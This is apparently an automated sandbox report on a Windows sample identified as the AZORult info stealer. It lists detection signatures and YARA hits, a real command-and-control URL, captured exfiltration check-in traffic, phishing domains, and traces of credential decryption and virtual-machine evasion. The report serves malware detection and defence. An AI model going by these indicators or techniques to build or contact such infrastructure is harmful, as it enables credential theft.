
Windows Analysis Report 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Overview

General Information

Sample Name: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Analysis ID: 491841
MD5: 73bd76f0549cc1992d943ddfd92a9c4d
SHA1: 802e70b76c7c0860b3a4a257b1bc96fc3430ff01
SHA256: 2f530a45e4acf58d16dad1b1e23b5b1419ba893c2f76f6625da3acb86933462f
Tags: AZORult, exe

Detection

AZORult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Detected AZORult Info Stealer
Yara detected Azorult Info Stealer
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider
IP address seen in connection with other malware
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Azorult

{"C2 url": "http://admin.svapofit.com/azs/index.php"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp | Azorult_1 | Azorult Payload | kevoreilly
  • 0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
  • 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
(4 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack | Azorult_1 | Azorult Payload | kevoreilly
  • 0x16753:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
  • 0x1147c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
(13 further entries not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Avira: detected
Found malware configuration
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp | Malware Configuration Extractor: Azorult {"C2 url": "http://admin.svapofit.com/azs/index.php"}
Multi AV Scanner detection for submitted file
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Virustotal: Detection: 68%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | ReversingLabs: Detection: 75%
Antivirus detection for URL or domain
Source: http://ww1.survey-smiles.com/% | Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/e | Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/z | Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/sof | Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/ | Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: admin.svapofit.com | Virustotal: Detection: 9%
Source: survey-smiles.com | Virustotal: Detection: 7%
Source: ww1.survey-smiles.com | Virustotal: Detection: 8%
Machine Learning detection for sample
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040A610 CryptUnprotectData,LocalFree, 0_2_0040A610
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose, 0_2_00413030
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, 0_2_004119A8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose, 0_2_004119AC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, 0_2_00412D6C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose, 0_2_0041160C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 0_2_00413F58
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 0_2_00413F58

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49862 -> 63.141.242.43:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://admin.svapofit.com/azs/index.php
Source: global traffic | HTTP traffic detected: POST /azs/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: admin.svapofit.com Content-Length: 101 Cache-Control: no-cache Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Cache-Control: no-cache Host: survey-smiles.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Cache-Control: no-cache Connection: Keep-Alive Host: ww1.survey-smiles.com Cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176
Source: Joe Sandbox View | ASN Name: NOCIXUS NOCIXUS
Source: Joe Sandbox View | IP Address: 199.59.242.153 199.59.242.153
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | String found in binary or memory: http://admin.svapofit.=
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | String found in binary or memory: http://admin.svapofit.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544541498.0000000000714000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.544083881.0000000002130000.00000004.00000001.sdmp | String found in binary or memory: http://admin.svapofit.com/azs/index.php
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | String found in binary or memory: http://admin.svapofit.com/azs/index.php8
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | String found in binary or memory: http://admin.svapofit.com/azs/index.phpSb
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: http://ip-api.com/json
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | String found in binary or memory: http://survey-smiles.c-k
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.543285229.000000000075E000.00000004.00000001.sdmp | String found in binary or memory: http://survey-smiles.com
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | String found in binary or memory: http://survey-smiles.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp | String found in binary or memory: http://survey-smiles.com/=
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | String found in binary or memory: http://survey-smiles.com/csvc
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp | String found in binary or memory: http://ww1.survey-smiles.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp | String found in binary or memory: http://ww1.survey-smiles.com/%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | String found in binary or memory: http://ww1.survey-smiles.com/e
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp | String found in binary or memory: http://ww1.survey-smiles.com/sof
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp | String found in binary or memory: http://ww1.survey-smiles.com/z
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: http://www.icq.com/legal/eula/en
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: http://www.icq.com/legal/privacypolicy/en
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: https://dotbit.me/a/
Source: unknown | HTTP traffic detected: POST /azs/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: admin.svapofit.com Content-Length: 101 Cache-Control: no-cache Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Source: unknown | DNS traffic detected: queries for: admin.svapofit.com
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle, 0_2_00417D84
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Cache-Control: no-cache Host: survey-smiles.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Cache-Control: no-cache Connection: Keep-Alive Host: ww1.survey-smiles.com Cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544526487.00000000006FA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Azorult Payload Author: kevoreilly
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: String function: 004034E4 appears 32 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Process Stats: CPU usage > 98%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Virustotal: Detection: 68%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | ReversingLabs: Detection: 75%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FF79707E-24CAA5BC7
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/3
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Static PE information: More than 200 imports for KERNEL32.dll

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Unpacked PE file: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0041A068 push 0041A08Eh; ret 0_2_0041A086
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0041A02C push 0041A05Ch; ret 0_2_0041A054
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040E8D0 push 0040E905h; ret 0_2_0040E8FD
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040B164 push 0040B190h; ret 0_2_0040B188
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040E908 push 0040E94Ah; ret 0_2_0040E942
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040B12C push 0040B158h; ret 0_2_0040B150
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040C136 push 0040C164h; ret 0_2_0040C15C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040C138 push 0040C164h; ret 0_2_0040C15C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040813C push 00408174h; ret 0_2_0040816C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004171E8 push 00417214h; ret 0_2_0041720C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040C9EA push 0040CA18h; ret 0_2_0040CA10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040C9EC push 0040CA18h; ret 0_2_0040CA10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040E1A4 push 0040E1D0h; ret 0_2_0040E1C8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040B1B8 push 0040B1E4h; ret 0_2_0040B1DC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040E25A push 0040E288h; ret 0_2_0040E280
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040E25C push 0040E288h; ret 0_2_0040E280
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00414A28 push 00414A84h; ret 0_2_00414A7C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040BAB8 push 0040BAE4h; ret 0_2_0040BADC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00409B54 push 00409BC8h; ret 0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00409B78 push 00409BC8h; ret 0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040D378 push 0040D3A8h; ret 0_2_0040D3A0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040D37C push 0040D3A8h; ret 0_2_0040D3A0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00413B7C push 00413BA8h; ret 0_2_00413BA0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040B3D8 push 0040B414h; ret 0_2_0040B40C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040B3DC push 0040B414h; ret 0_2_0040B40C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004183E4 push 00418410h; ret 0_2_00418408
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040BBEC push 0040BC18h; ret 0_2_0040BC10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00409B90 push 00409BC8h; ret 0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00413C10 push 00413C3Ch; ret 0_2_00413C34
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00404C1C push 00404C6Dh; ret 0_2_00404C65
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0040B420 push 0040B44Ch; ret 0_2_0040B444
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00417216
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00417216

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | RDTSC instruction interceptor: First address: 00000000021222C8 second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | RDTSC instruction interceptor: First address: 00000000021222CC second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FBD94B9982Ch 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00415E40 GetSystemInfo, 0_2_00415E40
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose, 0_2_00413030
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, 0_2_004119A8
